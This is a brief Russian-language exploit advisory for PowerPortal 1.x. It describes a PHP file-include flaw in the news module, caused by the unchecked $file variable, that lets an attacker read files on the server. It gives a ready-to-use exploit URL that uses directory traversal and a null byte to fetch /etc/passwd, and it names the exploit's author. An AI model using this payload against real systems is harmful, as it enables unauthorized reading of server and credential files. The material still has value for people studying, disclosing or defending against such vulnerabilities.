Уязвимые продукты: PowerPortal 1.х (возможно и старше)
Тип: PHP-Include
Результат: Чтение файлов на сервере
Уязвимость в модуле news
Отсутствует проверка переменной $file.
Эксплойт:
http://target/modules.php?name=news&file= ./../../../../../../../../../../etc/passwd%00
Автор: DeCode(iNFERNo)
